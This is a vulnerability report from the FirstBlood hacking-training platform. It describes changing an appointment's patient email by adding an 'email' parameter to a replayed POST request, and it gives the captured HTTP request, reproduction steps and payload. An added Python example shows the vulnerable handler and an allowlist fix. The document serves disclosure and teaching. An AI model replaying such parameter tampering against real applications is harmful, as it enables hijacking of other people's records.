FirstBlood-#877: It is possible to modify the email address of an appointment.
This issue was discovered on FirstBlood v2

On 2021-10-29, vigilante Level 4 reported:

Summary:

It is possible to modify the email address of an appointment. The same vulnerability was present in V1 of First Blood.

Description:

When modifying an appointment, the application tells us that "For safeguarding reasons you are only able to modify certain information about your appointment." The "patient email" field is greyed out and we're unable to modify it through the webpage. However, if we capture the POST request to modify the appointment message, we are able to modify the email field.

Steps to Reproduce:

  1. Create an appointment with email "ff".
  2. Log in to a doctor's account so we get a "doctorAuthed" cookie in Step 5.
  3. Go to modify that appointment: /manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
  4. Click on "modify event" and capture the request with Burp.
  5. Replay the request and add "&email=changedemail":

     POST /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41 HTTP/1.1
     Host: ca20e7622a6e-vigilante.a.firstbloodhackers.com
     Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b0b1f17cbc0fdc9a9ce23dfdf
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     X-Site-Req: permitted
     Csrf: 99215d4e-0ff3-4275
     Content-Length: 71
     Origin: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com
     Referer: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
     Sec-Fetch-Dest: empty
     Sec-Fetch-Mode: cors
     Sec-Fetch-Site: same-origin
     Te: trailers
     Connection: close

     message=test&id=2dbd91e1-b700-455e-a846-322be1985c41&email=changedemail

  6. After sending this, the patient's email address will change to "changedemail".

Impact

If someone got hold of our appointment id and they added the "doctorAuthed" cookie, they'd be able to change the email address to their own email address.

P3 Medium

Endpoint: /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41

Parameter: &email

Payload: &email=changedemail
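The fix for this class of bug is a server-side allowlist of the fields a caller may change, regardless of what the UI greys out. The following is an added defensive example, not FirstBlood's code: the field policy (only `message` is editable by a doctor), the function names and the audit format are assumptions, and the sample body is the one the report replays.

```python
from urllib.parse import parse_qs

# Constructed sample: the body the report replays against /api/ma.php.
REPORTED_BODY = "message=test&id=2dbd91e1-b700-455e-a846-322be1985c41&email=changedemail"

# Hypothetical policy mirroring the UI: a doctor may only change the message,
# the patient's email is read-only, and the appointment id must be present.
DOCTOR_EDITABLE = frozenset({"message"})
REQUIRED = frozenset({"id"})

class RejectedUpdate(ValueError):
    """Raised when the body carries fields the caller is not allowed to set."""

def parse_body(body: str) -> dict:
    """Flatten an x-www-form-urlencoded body to {field: last value}."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}

def vulnerable_apply(record: dict, body: str) -> dict:
    """'Before' shape of the bug: every submitted key except id is written
    through, so a field greyed out in the UI is still writable."""
    updated = dict(record)
    for field, value in parse_body(body).items():
        if field != "id":
            updated[field] = value
    return updated

def filter_update(body: str, editable=DOCTOR_EDITABLE) -> tuple:
    """Return (appointment_id, allowed_changes). Unexpected fields are
    rejected rather than silently dropped, so tampering fails loudly."""
    fields = parse_body(body)
    missing = REQUIRED - set(fields)
    if missing:
        raise RejectedUpdate(f"missing required field(s): {sorted(missing)}")
    forbidden = set(fields) - editable - REQUIRED
    if forbidden:
        raise RejectedUpdate(f"non-editable field(s) in request: {sorted(forbidden)}")
    return fields["id"], {k: fields[k] for k in editable if k in fields}

def hardened_apply(record: dict, body: str) -> dict:
    """'After' shape: only allowlisted fields reach the stored appointment."""
    _, changes = filter_update(body)
    return {**record, **changes}

def audit_line(body: str) -> str:
    """One-line record a detection rule can match on rejected attempts."""
    try:
        apt_id, changes = filter_update(body)
        return f"ok aptid={apt_id} changed={sorted(changes)}"
    except RejectedUpdate as exc:
        return f"REJECT reason={exc}"
```

Rejecting rather than dropping the stray field also gives the SOC a log line to alert on, since a legitimate browser never sends `email` from this form.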


FirstBlood ID: 33
Vulnerability Type: Application/Business Logic

Our mistake: We did not intentionally leave the code to change emails if the correct values were set; however, it created interesting results, because most discovered this but missed bug IDs 20 and 21, and whilst it was not possible to modify via integer, if the ID was known it would still work.